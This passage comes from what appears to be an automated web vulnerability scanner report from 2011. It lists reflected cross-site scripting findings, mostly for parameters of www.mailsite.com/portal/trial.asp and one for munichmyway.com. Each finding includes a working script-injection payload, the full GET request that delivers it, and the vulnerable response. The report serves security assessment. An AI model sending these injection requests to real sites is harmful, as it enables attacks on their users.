The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=5024a"><script>alert(1)</script>c4dc73218bdf8135f&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:08:49 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" autocomplete="off" size="30" maxlength="100" name="Email2" value="5024a"><script>alert(1)</script>c4dc73218bdf8135f" ID="Text6">
...[SNIP]...

3.71. http://www.mailsite.com/portal/trial.asp [Ext parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the Ext request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62da0"><script>alert(1)</script>8132e80da77b74d5d was submitted in the Ext parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=62da0"><script>alert(1)</script>8132e80da77b74d5d&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:08:27 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="6" maxlength="6" name="Ext"
value="62da0"><script>alert(1)</script>8132e80da77b74d5d" ID="Text4">
...[SNIP]...

3.72. http://www.mailsite.com/portal/trial.asp [FirstName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the FirstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e45f"><script>alert(1)</script>002c41aa3e5422ea6 was submitted in the FirstName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=7e45f"><script>alert(1)</script>002c41aa3e5422ea6&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:07:53 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="15" maxlength="15" name="FirstName"
value="7e45f"><script>alert(1)</script>002c41aa3e5422ea6" ID="Text1">
...[SNIP]...

3.73. http://www.mailsite.com/portal/trial.asp [LastName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the LastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf78"><script>alert(1)</script>4004675a7accf1613 was submitted in the LastName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=6bf78"><script>alert(1)</script>4004675a7accf1613&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:08:04 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="25" maxlength="25" name="LastName"
value="6bf78"><script>alert(1)</script>4004675a7accf1613" ID="Text2">
...[SNIP]...

3.74. http://www.mailsite.com/portal/trial.asp [MailboxQty parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the MailboxQty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad01b"><script>alert(1)</script>f97f00b1bc61e0487 was submitted in the MailboxQty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=ad01b"><script>alert(1)</script>f97f00b1bc61e0487&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:10:44 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="10" maxlength="10" name="MailboxQty" value="ad01b"><script>alert(1)</script>f97f00b1bc61e0487" ID="Text11">
...[SNIP]...

3.75. http://www.mailsite.com/portal/trial.asp [Phone parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the Phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66eec"><script>alert(1)</script>af95af7433ec180f6 was submitted in the Phone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=66eec"><script>alert(1)</script>af95af7433ec180f6&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:08:15 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28236


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="20" maxlength="20" name="Phone" value="66eec"><script>alert(1)</script>af95af7433ec180f6" ID="Text3">
...[SNIP]...

3.76. http://www.mailsite.com/portal/trial.asp [SourceDesc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the SourceDesc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0ec"><script>alert(1)</script>40e439a7c6095ec33 was submitted in the SourceDesc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc=ad0ec"><script>alert(1)</script>40e439a7c6095ec33 HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:11:09 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="50" maxlength="60" name="SourceDesc"
value="ad0ec"><script>alert(1)</script>40e439a7c6095ec33" ID="Text10">
...[SNIP]...

3.77. http://www.mailsite.com/portal/trial.asp [StateText parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the StateText request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0ed"><script>alert(1)</script>cb2b62692953b2e7a was submitted in the StateText parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=7d0ed"><script>alert(1)</script>cb2b62692953b2e7a&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:10:12 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28212


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="20" maxlength="20" name="StateText" value="7d0ed"><script>alert(1)</script>cb2b62692953b2e7a" ID="Text9">
...[SNIP]...

3.78. http://www.mailsite.com/portal/trial.asp [UserName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the UserName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26a60"><script>alert(1)</script>a47f54a6dcb361cb2 was submitted in the UserName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=26a60"><script>alert(1)</script>a47f54a6dcb361cb2&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:09:00 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="25" maxlength="15" name="UserName"
value="26a60"><script>alert(1)</script>a47f54a6dcb361cb2">
...[SNIP]...

3.79. http://www.mailsite.com/portal/trial.asp [Website parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the Website request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cbeb"><script>alert(1)</script>7d95377e38fb8dfe9 was submitted in the Website parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=9cbeb"><script>alert(1)</script>7d95377e38fb8dfe9&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:09:12 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28423


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="30" maxlength="80" name="Website"
value="9cbeb"><script>alert(1)</script>7d95377e38fb8dfe9" ID="Text7">
...[SNIP]...

3.80. http://www.mailsite.com/portal/trial.asp [Zip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the Zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecea8"><script>alert(1)</script>4622cbfd507228337 was submitted in the Zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=ecea8"><script>alert(1)</script>4622cbfd507228337&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:10:23 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28236


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="text" size="10" maxlength="10" name="Zip" value="ecea8"><script>alert(1)</script>4622cbfd507228337">
...[SNIP]...

3.81. http://www.mailsite.com/portal/trial.asp [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/trial.asp

Issue detail

The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0a8d"><script>alert(1)</script>379f3fe056866076e was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /portal/trial.asp?key=e0a8d"><script>alert(1)</script>379f3fe056866076e&Action=ADD&FirstForm=enter.asp&Procedure=ProcessLead&Required=FirstName%2CLastName%2CUsername%2CPassword%2CPhone%2CEmail%2CCompany%2CAddress1%2CState%2CCountry&Verify=Validate&FirstName=&LastName=&Phone=&Ext=&Email=&Email2=&UserName=&Website=&Company=&Country=&State=AA&StateText=&Zip=&CustBusiness=&MailboxQty=&LeadSource=1&SourceDesc= HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/trial.asp
Cache-Control: max-age=0
Origin: http://www.mailsite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:06:38 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 28260


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services
...[SNIP]...
<input type="hidden" name="key" value="e0a8d"><script>alert(1)</script>379f3fe056866076e">
...[SNIP]...

3.82. http://www.munichmyway.com/ecommerce/products/prodDetail.cfm [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /ecommerce/products/prodDetail.cfm

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9541'%3balert(1)//ee30cd37f24 was submitted in the t parameter. This input was echoed as e9541';alert(1)//ee30cd37f24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ecommerce/products/prodDetail.cfm?id=41&categoryId=95&b=5989&h=6025&p=6061&m=6097&x=6166&y=6202&z=6364&d=6337&g=6363&f=6415&l=6426&c=6427&t=6463e9541'%3balert(1)//ee30cd37f24 HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
